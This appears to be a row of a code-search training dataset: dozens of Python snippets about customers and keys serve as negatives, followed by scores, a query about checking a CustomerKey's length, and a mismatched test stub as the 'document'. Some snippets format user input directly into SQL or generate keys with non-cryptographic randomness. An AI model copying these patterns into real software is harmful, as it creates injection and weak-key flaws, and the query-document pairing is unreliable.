pulumi.set(__self__, \"user_id\", user_id)", "def _get_raw_key(self, key_id):", "def customer_id(self):\n return self._customer_id", "def create_key ():", "def _validate_beneficiary_customer_no_option_59(self, val):\n return val", "def _agency_agg_key(agency_type, agency_tier, record: dict) -> Optional[str]:\n if record[f\"{agency_type}_{agency_tier}_agency_name\"] is None:\n return None\n result = {\"name\": record[f\"{agency_type}_{agency_tier}_agency_name\"]}\n if f\"{agency_type}_{agency_tier}_agency_abbreviation\" in record:\n result[\"abbreviation\"] = record[f\"{agency_type}_{agency_tier}_agency_abbreviation\"]\n if f\"{agency_type}_{agency_tier}_agency_code\" in record:\n result[\"code\"] = record[f\"{agency_type}_{agency_tier}_agency_code\"]\n result[\"id\"] = record[f\"{agency_type}_toptier_agency_id\"]\n return json.dumps(result)", "def store_customer(self, name):\n pass", "def __init__(__self__, *,\n created_at: Optional[pulumi.Input[str]] = None,\n key: Optional[pulumi.Input[str]] = None,\n key_id: Optional[pulumi.Input[int]] = None,\n user_id: Optional[pulumi.Input[int]] = None):\n if created_at is not None:\n pulumi.set(__self__, \"created_at\", created_at)\n if key is not None:\n pulumi.set(__self__, \"key\", key)\n if key_id is not None:\n pulumi.set(__self__, \"key_id\", key_id)\n if user_id is not None:\n pulumi.set(__self__, \"user_id\", user_id)", "def customer_gateway_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"customer_gateway_id\")", "def _prepare_get_request(self, key):\n\n return {\n 'TableName': self.table_name,\n 'Key': {\n self._key_field.name: {\n self._key_field.data_type: key\n }\n }\n }", "def __init__(self, set_key=None, get_key='campaign_id'):\n self.set_key = set_key\n self.get_key = get_key", "def uuid(self, value):\n if value is not None:\n self.keystore['id'] = value\n elif 'id' in self.keystore:\n self.keystore.pop('id')", "def getEmailKey(self): \n return self.emailkey", "def transaction_recipient_agg_key(record: dict) -> str:\n if record[\"recipient_hash\"] is None or record[\"recipient_levels\"] is None:\n return json.dumps(\n {\n \"name\": record[\"recipient_name\"],\n \"duns\": record[\"recipient_unique_id\"],\n \"uei\": record[\"recipient_uei\"],\n \"hash_with_level\": \"\",\n }\n )\n return json.dumps(\n {\n \"name\": record[\"recipient_name\"],\n \"duns\": record[\"recipient_unique_id\"],\n \"uei\": record[\"recipient_uei\"],\n \"hash_with_level\": f\"{record['recipient_hash']}-{return_one_level(record['recipient_levels'])}\",\n }\n )", "def test_update_stripe_customer_id(self):\n pass", "def payload_add_customer(self, payload: dict, order: Order):\n if hasattr(order, \"lease\") and order.lease.application:\n application = order.lease.application\n payload.update(\n {\n \"email\": application.email.strip(),\n \"customer\": {\n \"firstname\": application.first_name.capitalize(),\n \"lastname\": application.last_name.capitalize(),\n \"email\": application.email.strip(),\n \"address_street\": application.address,\n \"address_zip\": application.zip_code,\n \"address_city\": application.municipality.capitalize(),\n },\n }\n )\n else:\n payload.update(\n {\n \"email\": order.customer_email.strip(),\n \"customer\": {\n \"firstname\": order.customer_first_name.capitalize()\n if order.customer_first_name\n else \"\",\n \"lastname\": order.customer_last_name.capitalize()\n if order.customer_last_name\n else \"\",\n \"email\": order.customer_email.strip(),\n \"address_street\": order.customer_address,\n \"address_zip\": order.customer_zip_code,\n \"address_city\": order.customer_city.capitalize()\n if order.customer_city\n else \"\",\n },\n }\n )", "def test_valid_customer(self):\n request = MockRequest()\n\n key_list = list_customer_keys(self._connection, _test_username)\n self.assertEqual(len(key_list), 1)\n key_id, key_value = key_list[0]\n\n authentication_string = compute_authentication_string(\n key_id,\n key_value,\n _test_username,\n _test_method,\n current_timestamp(),\n _test_uri\n )\n request.__dict__[\"authorization\"] = authentication_string.split()\n request.__dict__[\"method\"] = _test_method\n request.__dict__[\"headers\"] = {\n 'x-nimbus-io-timestamp' : str(current_timestamp())\n } \n request.__dict__[\"path_qs\"] = _test_uri\n\n authenticator = SqlAuthenticator()\n authenticated = authenticator.authenticate(\n self._connection, _test_username, request\n )\n self.assertTrue(authenticated)", "def gen_key(self):\n\n if len(self.fields) == 0:\n return None\n\n # we do not call self.validate() here as self._id will always be null,\n # so we call self.validator.validate on the schema. This will validate\n # that 'effectiveDate', 'carrier', and 'flightNumber' are not None\n # and of valid data type\n if self.validator.validate(self.fields) == False:\n return None\n\n h = hashlib.md5()\n h.update(self.fields['effectiveDate'].isoformat())\n h.update(str(self.fields['carrier']))\n h.update(str(self.fields['flightNumber']))\n\n return h.hexdigest()", "def create_raw(self, key, value):\n data = None\n if key is not None and value is not None:\n try:\n data = self.tcex.key_value_store.create(self._context, key.strip(), value)\n except RuntimeError as e:\n self.log.error(e)\n else:\n self.log.warning('The key or value field was None.')\n return data", "async def build_key(self, attribute, value, record_id='*'):\n self.key = '{var1}:{var2}:{var3}:{var4}:{var5}'.format(var1=record_id, var2=self.industry, var3=self.merchant,\n var4=attribute, var5=value)", "def key(self, value=None):\n if self.crypt_method == 'C':\n key_type = \"number\"\n else:\n key_type = \"string\"\n\n input_message = f\"Please enter a {key_type} as a \" \\\n f\"{self.crypt_type}ion key\\n>> \"\n if value is None:\n key = input(input_message)\n else:\n key = value\n\n is_valid_key, key = Check.is_valid_key(key, self.crypt_method)\n if is_valid_key:\n self._key = key\n else:\n raise ValueError(f\"Key{key} is invalid\")", "def award_recipient_agg_key(record: dict) -> str:\n if record[\"recipient_hash\"] is None or record[\"recipient_levels\"] is None:\n return json.dumps(\n {\n \"name\": record[\"recipient_name\"],\n \"duns\": record[\"recipient_unique_id\"],\n \"uei\": record[\"recipient_uei\"],\n \"hash\": \"\",\n \"levels\": \"\",\n }\n )\n return json.dumps(\n {\n \"name\": record[\"recipient_name\"],\n \"duns\": record[\"recipient_unique_id\"],\n \"uei\": record[\"recipient_uei\"],\n \"hash\": str(record[\"recipient_hash\"]),\n \"levels\": record[\"recipient_levels\"],\n }\n )", "def update(self):\n schema = load_customer_schema(self.request)\n for key, value in schema.iteritems():\n setattr(self.customer, key, value)\n return {'klant': self.customer}", "def _county_agg_key(location_type, record: dict) -> Optional[str]:\n if record[f\"{location_type}_state_code\"] is None or record[f\"{location_type}_county_code\"] is None:\n return None\n return json.dumps(\n {\n \"country_code\": record[f\"{location_type}_country_code\"],\n \"state_code\": record[f\"{location_type}_state_code\"],\n \"state_fips\": record[f\"{location_type}_state_fips\"],\n \"county_code\": record[f\"{location_type}_county_code\"],\n \"county_name\": record[f\"{location_type}_county_name\"],\n \"population\": record[f\"{location_type}_county_population\"],\n }\n )", "def test_add_none_field(self):\n user_id = get_rand_string()\n data = get_rand_string()\n id = get_rand_string()\n\n doc = {}\n doc[\"user_id\"] = user_id\n doc[\"data\"] = data\n doc[\"id\"] = id\n doc[\"num\"] = None\n\n self.conn.add(**doc)", "def _setordering_customer_50K(self, val):\n self.swift_obj.OrderingCustomer_K = val\n self.swift_obj.OrderingCustomer_K.swiftTag = '50K'", "def _congressional_agg_key(location_type, record: dict) -> Optional[str]:\n if record[f\"{location_type}_state_code\"] is None or record[f\"{location_type}_congressional_code\"] is None:\n return None\n return json.dumps(\n {\n \"country_code\": record[f\"{location_type}_country_code\"],\n \"state_code\": record[f\"{location_type}_state_code\"],\n \"state_fips\": record[f\"{location_type}_state_fips\"],\n \"congressional_code\": record[f\"{location_type}_congressional_code\"],\n \"population\": record[f\"{location_type}_congressional_population\"],\n }\n )", "def setnoempty(self, key, value):\r\n if value:\r\n self[key] = value", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"id\":\n return \"Id\"\n return key", "def retrieve_order_by_payment_type_none(self, customer_id):\n with sqlite3.connect('bangazon.db') as conn:\n c = conn.cursor()\n c.execute(\"SELECT * FROM Orders WHERE customer_Id = '{}' AND payment_type_Id is null\".format(customer_id))\n customer_order = c.fetchall()\n return customer_order", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def __init__(__self__, *,\n key: Optional[pulumi.Input[str]] = None,\n value: Optional[pulumi.Input[str]] = None):\n if key is not None:\n pulumi.set(__self__, \"key\", key)\n if value is not None:\n pulumi.set(__self__, \"value\", value)", "def filter_sent_to_customer(self, queryset, name, value):\n if str2bool(value):\n return queryset.exclude(customer=None)\n else:\n return queryset.filter(customer=None)", "def case_key(case):\n if hasattr(case, 'key'):\n return case.key\n key = str(uuid.uuid1())\n return key", "def customer_managed_key_encryption(self) -> Optional[pulumi.Input['ClusterPropertiesCustomerManagedKeyEncryptionArgs']]:\n return pulumi.get(self, \"customer_managed_key_encryption\")", "def customer_name(self, customer_name):\n self._customer_name = customer_name", "def add_default_params(self, params):\n params['key'] = self.key\n params['format'] = self.format\n #params['unique_id'] = generate_unique_id()\n return params", "def stringKey(obj):\n unproxied = proxy.removeSecurityProxy(obj)\n mapper = orm.object_mapper(unproxied)\n #primary_key = mapper.primary_key_from_instance(unproxied)\n identity_values = [ getattr(unproxied, c.name) for c in mapper.primary_key ]\n identity_key = \"-\".join(map(str, identity_values))\n return \"obj-%s\" % (identity_key)", "def key_name(self) -> Optional[str]:\n return pulumi.get(self, \"key_name\")", "def get_customer_id(self):\n return self.machine_config_file_value(\"DEFAULT.CID\").strip('\"')" ]
[ "0.5777039", "0.5651661", "0.5604638", "0.548038", "0.5478544", "0.5453205", "0.5365021", "0.53444165", "0.5324741", "0.5306071", "0.5301674", "0.52935547", "0.52801406", "0.5263718", "0.52251005", "0.52210206", "0.5198161", "0.51958966", "0.5189117", "0.51726973", "0.51626706", "0.51541895", "0.51535255", "0.5126936", "0.5126936", "0.51253086", "0.5100831", "0.5095781", "0.50942975", "0.50747514", "0.5059931", "0.5059217", "0.5053175", "0.5040561", "0.50395024", "0.5034506", "0.50340796", "0.5016641", "0.5016449", "0.5015035", "0.4995279", "0.49863625", "0.4982395", "0.49741608", "0.49721995", "0.49694815", "0.49569762", "0.49556398", "0.49516675", "0.49497324", "0.49312064", "0.49090877", "0.49078837", "0.4907312", "0.49060458", "0.4905829", "0.49051657", "0.49027944", "0.49022755", "0.49000204", "0.4896455", "0.48943847", "0.48902977", "0.48767942", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48680988", "0.48647967", "0.4858672", "0.48571673", "0.48546547", "0.4852732", "0.4847722", "0.48452163", "0.48442084" ]
0.0
-1
Check length of CustomerKey (len= 50)
def test_45(self): assert 'True' == Api.requestBlock('test-45')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def test_neg_list_size_with_nonexistent_key(self):\n charSet = 'abcdefghijklmnopqrstuvwxyz1234567890'\n minLength = 5\n maxLength = 30\n length = random.randint(minLength, maxLength)\n key = ('test', 'demo', ''.join(map(lambda unused:\n random.choice(charSet),\n range(length))) + \".com\")\n try:\n self.as_connection.list_size(key, \"contact_no\")\n except e.RecordNotFound as exception:\n assert exception.code == 2", "def prepKey(key, length):\r\n keyString = \"\"\r\n while len(keyString) < length:\r\n for char in key:\r\n if len(keyString) < length:\r\n keyString += char\r\n return keyString", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def _is_valid_key(self, key):\r\n\r\n # Check the length\r\n if len(key) > 250:\r\n return False\r\n\r\n # Check that there are no spaces or control characters\r\n for char in key:\r\n if ord(char) < 33 or ord(char) == 127:\r\n return False\r\n\r\n return True", "def proper_key(key, klen):\n ckey = \"\"\n if len(key) < klen:\n lmulti = math.floor(klen/len(key))\n lmod = klen % len(key)\n ckey = key * int(lmulti) + key[:lmod]\n elif len(key) > klen:\n ckey = key[:klen]\n else:\n ckey = key\n return ckey", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def test_long():\n key = 'A' * 242\n hashed_key = '%s[3705915182]' % ('A' * 229)\n full_key = 'prefix:1:%s' % hashed_key\n assert full_key == make_key(key, 'prefix', 1)", "def isValidKey(key):\n return True", "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def min_length(verifield, required):\n if verifield is None: return True\n return len(verifield) >= required", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def _is_size_key (self, key):\n return key == '$size' or key == 'size'", "def len12(self, len): # -> None:\n ...", "def generate_key(length):\n return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))", "def key_size(self) -> int:\n pass", "def key_size(self) -> int:\n pass", "def is_valid(key):\n return key[0:2] == \"MR\" and key[2:].isdigit() and len(key) in [9, 10]", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def test_generate_key(self): \n k = Key().generate()\n self.assertRegex(k, \"[a-zA-Z0-9+\\/]+={0,2}\")", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def check_type( string_key ) : \r\n\r\n if type( string_key ) != type( '' ) : \r\n\r\n # raise self.__class__( \"'%s': EGI wants the key to be four _characters_ (not %s) !\" % (type(string_key), ) ) \r\n raise Eggog( \"'%s': EGI wants the key to be four _characters_ (not %s) !\" % (type(string_key), ) ) \r\n \r\n else :\r\n \r\n return True", "def testKeyInfoTooLong(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey',\n keyInfo='xxxxx')", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def _validate_and_split_key(self, key):\n if self._len_keys == 1:\n return self._validate_and_split_len_one(key)\n else:\n return self._validate_and_split_len(key)", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def generate_api_key(key_length: int = settings.api_app_auth_key_length) -> str:\n return secrets.token_urlsafe(64)[:key_length]", "def test_minlength():\n assert has_min_length(None, 8) is None\n assert has_min_length('abcd1234', 8) is None\n assert has_min_length('a', 8)", "def generate_key( length=10, char_set='all' ):\n\n if char_set == 'digits':\n char_list = string.digits\n elif char_set == 'letters':\n char_list = string.lowercase[:26] + string.uppercase[:26]\n else:\n char_list = good_chars\n\n char_list_limit = len( char_list ) - 1\n\n key = ''\n i = 0\n while i < length:\n key = string.join( [ key , char_list[ random.randint( 0, char_list_limit ) ] ], '' )\n i = i + 1\n\n return key", "def test_short():\n key = 'A' * 241\n full_key = 'prefix:1:%s' % key\n assert full_key == make_key(key, 'prefix', 1)", "def guess_key_length(self, min_len=1, max_len=9, display=False):\n\n res = {}\n max_ic = 0\n probable_key_length = 0\n # We try different key lengths\n for i in range(min_len, max_len+1):\n\n if self._len < i*2:\n continue\n ics = []\n for j in range(i):\n var = []\n for k in range(self._len//i):\n var.append(self._s[k*i + j])\n text = VigenereLikeCipher(''.join(var))\n ics.append(text.get_ic())\n total_ic = round(sum(ics)/len(ics),4)\n if total_ic > max_ic:\n max_ic = total_ic\n probable_key_length = i\n res[i] = total_ic\n if display:\n print \"\\n[+] Visual key length IC correspondance\"\n for k,v in res.items():\n v = int(round(v*1000,0))\n print str(k) + (int(math.floor(math.log10(len(res))))+1-len(str(k)))*\" \",\n print ''.join(['|' for i in range(v//2)])\n print \"\"\n return probable_key_length", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def _enforce_txt_record_maxlen(key, value):\n # Add 1 for '=' separator between key and value\n if len(key) + len(value) + 1 > 255:\n # 255 - 3 ('...') - 1 ('=') = 251\n return value[: 251 - len(key)] + \"...\"\n return value", "def generate_randomkey(length):\n chars = string.letters + string.digits\n return ''.join([choice(chars) for i in range(length)])", "def _validate_ordering_customer_50K(self, val):\n return val", "def unique_key(size):\n # Charset to create keys from\n charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'\n l = len(charset)-1\n bad_key = 1\n\n # Get a new seed\n ran.seed()\n\n while(bad_key > 0):\n # Create key\n key = list()\n for i in range(size):\n r = ran.randint(0, l)\n key.append(charset[r])\n key = \"\".join(key)\n\n # Check key\n bad_key = check_key(key)\n\n return(key)", "def _validate_string_min_length(self, value):\n if self.min_length is not None:\n return len(str(value)) >= self.min_length\n else:\n return True", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def checkSize(rsakey, messageSize):\n keySize = key.getKeyLength(rsakey)\n if(keySize >= messageSize):\n return True\n if(keySize < messageSize):\n return False", "def test_minmaxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'code': 'AA'}\n self.assertTrue(val.validate(document))\n\n document = {'code': 'A'}\n self.assertFalse(val.validate(document))\n\n document = {'code': 'ABC'}\n self.assertFalse(val.validate(document))", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def setup_key_encrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile True:\r\n\t\t\tkey = input(f\"Please enter a key value less than or equal to {self.max_key}. --> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\t\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key\")\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def hstrlen(self, key, field):\n return self._command(b'HSTRLEN', key, field)", "def size(self, key):\n return self.cli.passwords.size(key)", "def test_set_key_too_long(self):\n with RandomKeyTmpFile(128) as fname:\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", fname]\n self.check_error(StratisCliEngineError, command_line, _ERROR)", "def _check_key(self, key):\n raise NotImplementedError", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def kem_encapsulated_key_len(self, public_key):\n result = self._lib_vscf_ecc.vscf_ecc_kem_encapsulated_key_len(self.ctx, public_key.c_impl)\n return result", "def test_client_email_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_email').max_length\n self.assertEquals(max_length, 100)", "def len23(self, len): # -> None:\n ...", "def random_key(size):\n return ''.join(random.choice(string.letters) for _ in range(size))", "def check_keys(self):", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def generate_key(length, choices=None):\n if choices is None:\n choices = (\n string.ascii_lowercase +\n string.ascii_uppercase +\n string.digits\n )\n\n return ''.join(random.choice(choices) for x in xrange(length))", "def test_valid_key(self):\n f = lws.valid_data_key\n assert f('string', int, r'string') is False\n assert f('string', str, r'test') is False\n assert f(123, int, '123') is False\n assert f(123.00, float, '123') is False\n assert f('123', str, r'[0-9]*') is True", "def format_length( self, key ) :\r\n\r\n return struct.calcsize( self[key] )", "def test_utils_random_string(self, tcex, string_length):\n result = tcex.utils.random_string(string_length=string_length)\n assert (\n len(result) == string_length\n ), f'The length of the string {len(result)} != {string_length}'", "def __len__(self):\n return self.cli.passwords.len()", "def make_random_key(length=RANDOM_KEY_LENGTH, chars=RANDOM_KEY_CHARACTERS):\n chars = [random.choice(chars) for _ in range(length)]\n return ''.join(chars)", "def get_max_key(data):\n return max(map(len, data))", "def RequireScriptHash(key):\n Require(len(key) == 20)\n return True", "def key_length(self):\n if hasattr(self, '_m_key_length'):\n return self._m_key_length if hasattr(self, '_m_key_length') else None\n\n self._m_key_length = self.rsa_n.length_in_bits\n return self._m_key_length if hasattr(self, '_m_key_length') else None", "def test_allowed_chars(self):\n hash_val = self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def test_maxlength():\n assert has_max_length(None, 2) is None\n assert has_max_length('abcd1234', 2)\n assert has_max_length('a', 2) is None", "def get_random_key(self, size=16):\n key = ''.join([random.choice(Characters.get_characters()) for i in range(size)])\n return self.__strengthen_key(key)", "def sanetoken(token):\n\t# len(CryptoHelper.longEncode(2**4096)) = 1372\n\tMAX_TOKEN_LEN = 1372\n\treturn len(token) <= MAX_TOKEN_LEN", "def password_min_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"password_min_length\")", "def password_min_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"password_min_length\")", "def test_valid_customer(self):\n request = MockRequest()\n\n key_list = list_customer_keys(self._connection, _test_username)\n self.assertEqual(len(key_list), 1)\n key_id, key_value = key_list[0]\n\n authentication_string = compute_authentication_string(\n key_id,\n key_value,\n _test_username,\n _test_method,\n current_timestamp(),\n _test_uri\n )\n request.__dict__[\"authorization\"] = authentication_string.split()\n request.__dict__[\"method\"] = _test_method\n request.__dict__[\"headers\"] = {\n 'x-nimbus-io-timestamp' : str(current_timestamp())\n } \n request.__dict__[\"path_qs\"] = _test_uri\n\n authenticator = SqlAuthenticator()\n authenticated = authenticator.authenticate(\n self._connection, _test_username, request\n )\n self.assertTrue(authenticated)", "def field_length(self,\r\n entrylist=None):\r\n\r\n\r\n if entrylist is None:\r\n entrylist = list(self.default_dict['field'].keys())\r\n maxlength = 0\r\n for i_temp in entrylist:\r\n if len(self.default_dict['field'][i_temp]) > maxlength:\r\n maxlength = len(self.default_dict['field'][i_temp])\r\n return maxlength", "def str_len():\n strlen_dict = {}\n # Length of ion name\n strlen_dict['ion'] = 6\n # Length of data file name for line source\n strlen_dict['Source'] = 30\n # Return\n return strlen_dict", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def is_name_length_valid(self) -> bool:\n return 2 < len(self.app_name) <= 35", "def verify_hack_key(self):\r\n\t\tself.percent_english = Dict_Control(self.my_code).check_key()\r\n\t\t#If more than half the words are english, the key will pass. \r\n\t\tif self.percent_english > 50:\r\n\t\t\tself.hack_plausible = True", "def test_wrong_total_number_of_keys(self):\n xml = self._make_request()\n request = request_from_xml(xml)\n policy = replace(self.policy, num_different_keys_in_all_bundles=2)\n with self.assertRaises(KSR_POLICY_KEYS_Violation) as exc:\n validate_request(request, policy)\n self.assertEqual(\n \"Unacceptable number of key sets in request test, (1 keys instead of 2)\",\n str(exc.exception),\n )", "def _validate_beneficiary_customer_59A(self, val):\n return val", "def is_perCapita(key):", "def number_keys(a_dictionary):\n return(len(a_dictionary))", "def getNumberOfKeys(self) -> int:\n ...", "def _validate_string_max_length(self, value):\n if self.max_length is not None:\n return len(str(value)) <= self.max_length\n else:\n return True", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def gen_randomkey(length):\n chars = string.letters + string.digits + string.punctuation\n return ''.join([choice(chars) for _ in xrange(int(str(length)))])", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def __len__(self):\n return len(self.token2id)", "def confirm_resdic_chainid_length(params):\n resdic_params = (p for p in params if p.startswith('resdic_'))\n for param in resdic_params:\n chainid = param.split('_')[-1]\n if len(chainid) > 1:\n raise ValueError(\n f\"We found the parameter {param!r} which has \"\n \"more than one character in the chain \"\n \"identifier. Chain IDs should have only one character.\"\n )", "def max_length(length):\n def validate(value):\n if len(value) <= length:\n return True\n raise Exception('%s must be at most %s characters long' % length)\n return validate", "def test_kf_id():\n\n for _ in range(1000):\n prefix = ''.join(random.sample(string.ascii_uppercase, 2))\n kf_id = kf_id_generator(prefix)()\n assert kf_id[:2] == prefix\n assert len(kf_id) == 11\n assert kf_id[2] == '_'\n\n assert 'I' not in kf_id[2:]\n assert 'L' not in kf_id[2:]\n assert 'O' not in kf_id[2:]\n assert 'U' not in kf_id[2:]\n\n assert re.search(r'^'+prefix+r'_[A-HJ-KM-NP-TV-Z0-9]{8}', kf_id)", "def generate_random_key(self):\n self.key = ''.join(choice(ascii_letters + digits) for i in range(300))", "async def key(ctx, note:str, length=7):\n if length < 1:\n length = 1\n elif length > 7:\n length = 7\n answer=Tempo.getKeyScale(note)\n solution = 'Next notes in this key is: '+str(answer)\n await ctx.send(solution)", "def validate_length(string):\n if len(string) > 110:\n raise ValidationError('Tweet must be less than 110 characters')", "def __len__(self):\n return 30", "def safe_key(key, key_prefix, version):\r\n\r\n # Clean for whitespace and control characters, which\r\n # cause memcache to raise an exception\r\n key = cleaned_string(key)\r\n key_prefix = cleaned_string(key_prefix)\r\n version = cleaned_string(version)\r\n\r\n # Attempt to combine the prefix, version, and key\r\n combined = \":\".join([key_prefix, version, key])\r\n\r\n # If the total length is too long for memcache, hash it\r\n if len(combined) > 250:\r\n combined = fasthash(combined)\r\n\r\n # Return the result\r\n return combined", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def test_has_correct_number_of_keys_and_values(self):\n self.has_correct_number_of_keys_and_values(2, 1)", "def test_has_correct_number_of_keys_and_values(self):\n self.has_correct_number_of_keys_and_values(2, 1)", "def test_client_ip_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_ip').max_length\n self.assertEquals(max_length, 100)", "def nkeytexts(self):\n return len(self.__keytexts)" ]
